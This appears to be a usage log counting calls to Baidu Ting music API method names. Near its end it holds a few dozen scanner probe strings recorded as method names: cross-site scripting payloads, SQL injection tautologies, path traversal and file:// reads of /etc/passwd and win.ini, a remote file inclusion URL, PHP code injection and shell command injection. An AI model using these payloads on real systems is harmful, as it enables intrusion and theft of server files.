baidu.ting.song.getInfos	81877729
baidu.ting.search.lrcpic	35363815
baidu.ting.song.baseInfo	27855214
baidu.ting.user.listenAge	24866464
baidu.ting.search.catalogSug	24657801
baidu.ting.search.common	21277132
baidu.ting.song.play	20884648
baidu.ting.favorite.isCollect	12717007
baidu.ting.song.down	11561204
baidu.ting.song.lry	9629874
baidu.ting.user.getUserBaseInfo	8970085
baidu.ting.artist.getSongList	6474735
baidu.ting.artist.getList	6081398
ting.baidu.diy.getPlaylists	5677613
baidu.ting.billboard.billList	5630926
baidu.ting.user.config	5463269
baidu.ting.song.getInfo	5097423
baidu.ting.outerPassport.profile	5013997
baidu.ting.search.getPhotoInfos	4629805
baidu.ting.search.lrcys	4604042
baidu.ting.plaza.getRecommendAlbum	3956861
baidu.ting.active.start	3657032
baidu.ting.user.checkComVersion	3322546
baidu.ting.plaza.active	3165185
baidu.ting.game.gamedetail	3126877
	2716330
baidu.ting.artist.getInfo	2688867
baidu.ting.radio.playAction	2652515
baidu.ting.diy.gedanInfo	2637328
baidu.ting.user.getMessage	2447853
baidu.ting.user.checkSuggestVersion	2390851
baidu.ting.diy.gedanHot	2185551
baidu.ting.vip.checkVIPPromotion	2098705
baidu.ting.diy.getNowOfficalList	1972507
baidu.ting.artist.getinfo	1814916
baidu.ting.search.lrcyss	1812570
baidu.ting.search.suggestion	1780626
baidu.ting.diy.category	1730693
ting.baidu.plaza.recdaily	1700328
baidu.ting.plaza.recdaily	1525855
baidu.ting.radio.getChannelSong	1385917
baidu.ting.diy.getSongFromOfficalList	1260312
baidu.ting.diy.addListenCount	1216366
baidu.ting.album.getAlbumInfo	1208535
baidu.ting.feedback.song	1162097
baidu.ting.favorite.getCollectSong	1108195
baidu.ting.plaza.getPartDesc	1065870
baidu.ting.artist.getAlbumList	1023826
baidu.ting.user.registToUC	972568
baidu.ting.song.buffer	931413
baidu.ting.user.down	867501
baidu.ting.diy.gedan	845196
baidu.ting.tag.songlist	753382
baidu.ting.user.RegistToImsg	733998
baidu.ting.tag.getHotTag	705687
baidu.ting.song.audio	583884
baidu.ting.billboard.billCategory	527723
baidu.ting.radio.getCategoryList	492170
baidu.ting.diy.getPlaylists	391530
baidu.ting.game.gamelist	351740
baidu.ting.search.getPhotoInfo	316834
baidu.ting.plaza.recommend	255409
baidu.ting.plaza.getFocusPic	253808
baidu.ting.song.getMulInfos	248548
baidu.ting.favorite.addSongFavorite	240368
baidu.ting.artist.get72HotArtist	227951
baidu.ting.favorite.getFavoriteSong	186233
baidu.ting.favorite.addSongFavorites	183653
baidu.ting.mv.getIndexMV	149320
baidu.ting.diy.search	134346
baidu.ting.video.getList	120887
baidu.ting.tag.getAllTag	120363
baidu.ting.cloud.checkFile	101196
baidu.ting.video.play	97172
baidu.ting.diy.addListSong	95903
baidu.ting.cloud.record	95723
baidu.ting.diy.getSimilarGedan	86409
baidu.ting.diy.getOfficialDiyList	84810
baidu.ting.user.nplogin	70917
baidu.ting.favorite.delCollectSong	66307
baidu.ting.mv.playMV	64422
baidu.ting.user.checkVersion	53125
ting.baidu.diy.getPlaylist	49689
baidu.ting.song.baseInfos	49131
baidu.ting.plaza.getNewSongs	45146
baidu.ting.radio.getArtistChannelSong	37582
baidu.ting.radio.getFavoriteSong	31131
baidu.ting.plaza.getArtistPlaza	25760
baidu.ting.feedback.crash	25124
baidu.ting.song.getPic	24776
baidu.ting.artist.getSpecialSongList	23402
baidu.ting.mv.searchMV	20780
baidu.ting.diy.getPlaylist	19693
baidu.ting.radio.serv	16637
baidu.ting.diy.saveList	16318
baidu.ting.cloud.expand	15498
baidu.ting.artist.getHighSongTitle	14793
baidu.ting.album.getList	11205
baidu.ting.favorite.delSongFavorite	10818
baidu.ting.song.cloud	10574
ting.baidu.film.getFilmInfo	10261
baidu.ting.video.category	9146
baidu.ting.song.getMulInfo	7533
baidu.ting.artist.getQianQianArtist	7246
ting.baidu.song.lry	6768
baidu.ting.weixin.response	6694
baidu.ting.diy.delListSong	6564
baidu.ting.diy.delList	6259
baidu.ting.billboard.catalog	5859
baidu.ting.cloud.signature	5824
baidu.ting.user.logout	4711
baidu.ting.artist.getHighSongList	4429
baidu.ting.diy.addList	3780
baidu.ting.mv.getMultiSongMVInfo	3767
baidu.ting.user.regPassport	3766
baidu.ting.colorRing.listen	3735
ting.baidu.artistapp.renum	3277
ting.baidu.search.lrcpic	3037
baidu.ting.user.getMobileVcode	2731
baidu.ting.colorRing.getCode	2587
ting.baidu.search.common	2365
baidu.ting.colorRing.authset	2341
baidu.ting.favorite.delSongFavorites	2027
baidu.ting.mv.getMVCategory	1840
baidu.ting.diy.getRecommendSpeical	1727
baidu.ting.favorite.getFavoriteAlbum	1670
baidu.ting.artist.getInfoList	1507
baidu.ting.artist.getSong	1272
baidu.ting.artist.getSongRank	1259
ting.baidu.billboard.billlist	1239
baidu.ting.favorite.getListenHistory	1196
ting.baidu.artistapp.brief	763
baidu.ting.diy.upList	751
baidu.ting.favorite.getOffenListenList	740
baidu.ting.feedback.info	715
ting.baidu.billboard.billCategory	674
ting.baidu.plaza.getRecommendAlbum	670
ting.baidu.diy.gedanhot	638
ting.baidu.song.cloud	630
ting.baidu.song.getinfos	625
ting.baidu.song.baseInfo	619
ting.baidu.song.down	618
ting.baidu.song.play	594
ting.baidu.diy.gedaninfo	594
ting.baidu.diy.gedan	585
baidu.ting.video.recMv	574
baidu.ting.song.getSuoSongInfo	375
baidu.ting.colorRing.subscribe	319
baidu.ting.user.activate	310
baidu.ting.colorRing.toneset	304
baidu.ting.artist.getInfoByName	299
baidu.ting.artistapp.photo	229
baidu.ting.favorite.getInfoFromView	222
ting.baidu.artistapp.newList	206
ting.baidu.plaza.getFocusPic	181
baidu.ting.user.login	178
ting.baidu.artistapp.news	116
baidu.ting.favorite.addAlbumFavorite	106
baidu.ting.song.getHash	90
baidu.ting.user.addPassportInfo	83
ting.baidu.artistapp.briefs	52
baidu.ting.search.merge	49
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	41
baidu.ting.favorite.delAlbumFavorite	39
baidu.ting.plaza.getMisNewSong	35
baidu.ting.song.playAAC	29
baidu.ting.game.catalog	16
ting.baidu.artistapp.send	13
baidu.ting.album.getAlbumstyle	10
skin.getList	6
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
(	3
\' (	3
baidu.ting.user.checkPassWeak	3
baidu.ting.song.play\';alert(1);\'	2
http://10.42.7.217/?1389466084.72	2
baidu.ting.diy.getn=lovejsw_pg	2
baidu.ting.user.checkNameUsed	2
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	1
${@print(md5(812812))}	1
baidu.ting.push.send	1
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpeg	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	1
%-\"%.	1
baidu.ting.song.play</textarea></title><script>alert(1)</script>	1
baidu.ting.song.play--></script><script>alert(1)</script>	1
../../../../../../../../../../etc/rc.d/rc.local_.html	1
baidu.ting.song.play>\'>\"><script>alert(1)</script>	1
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	1
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	1
http://cirt.lnet/rfiinc.txt	1
file:///etc/passwd	1
../../../../../../../../../../etc/rc.d/rc.local_	1
baidu.ting.song.play<script>confirm(1)</script>	1
../../../../../../../../../../etc/rc.d/rc.local	1
../../../../../../../../../../etc/passwd_.jpg	1
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	1
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	1
file:///etc/passwd_.jpg	1
../../../../../../../../../../etc/passwd_	1
../../../../../../../../../../etc/passwd	1
set	1
ting.baidu.diy.getPyNklrZkJTQVFBQUFBJ=0	1
baidu.ting.song.playjavascript:alert(1)	1
data://text/plain;base64,dGVzdA==_.jpg	1
file:///etc/rc.d/rc.local_	1
c:/windows/win.ini_.jpg	1
baidu.ting.song.play\'\";alert(1);//	1
baidu.ting.soipwr489jV3m9zn6K1SjSU=	1
c:/windows/win.ini	1
/usr/bin/id;	1
baidu.ting.song.play\' and \'8281\'=\'8281	1
data://text/plain;base64,dGVzdA==_	1
baidu.ting.song.play\";alert(1);\"	1
data://text/plain;base64,dGVzdA==	1
baidu.ting.song.play\') and 8288=8288 and (\'	1
file:///etc/rc.d/rc.local	1
1\\\";cat /etc/rc.d/rc.local;\\\"	1
http://cirt.lnet/rfiinc.txt_.jpg	1
baidu.ting.song.play</script><script>alert(1);//	1
baidu.ting.song.play;alert(1);//	1
baidu.ting.radio.getcategorylist	1
file:///etc/passwd_	1
string:{var_dump(md5(812812))}	1
file:///etc/rc.d/rc.local_.jpg	1
baidu.tE5½¹ç_±æ__ä¼ è¯´$$	1
ba	1
%{	1
${	1
1;cat /etc/rc.d/rc.local;	1
\'];${@print(md5(812812))};//	1
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	1
1\';cat /etc/rc.d/rc.local;\'	1
http://cirt.lnet/rfiinc.txt_	1
c:/windows/win.ini_	1
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	1
baidu.ting.sgid=0	1
	1
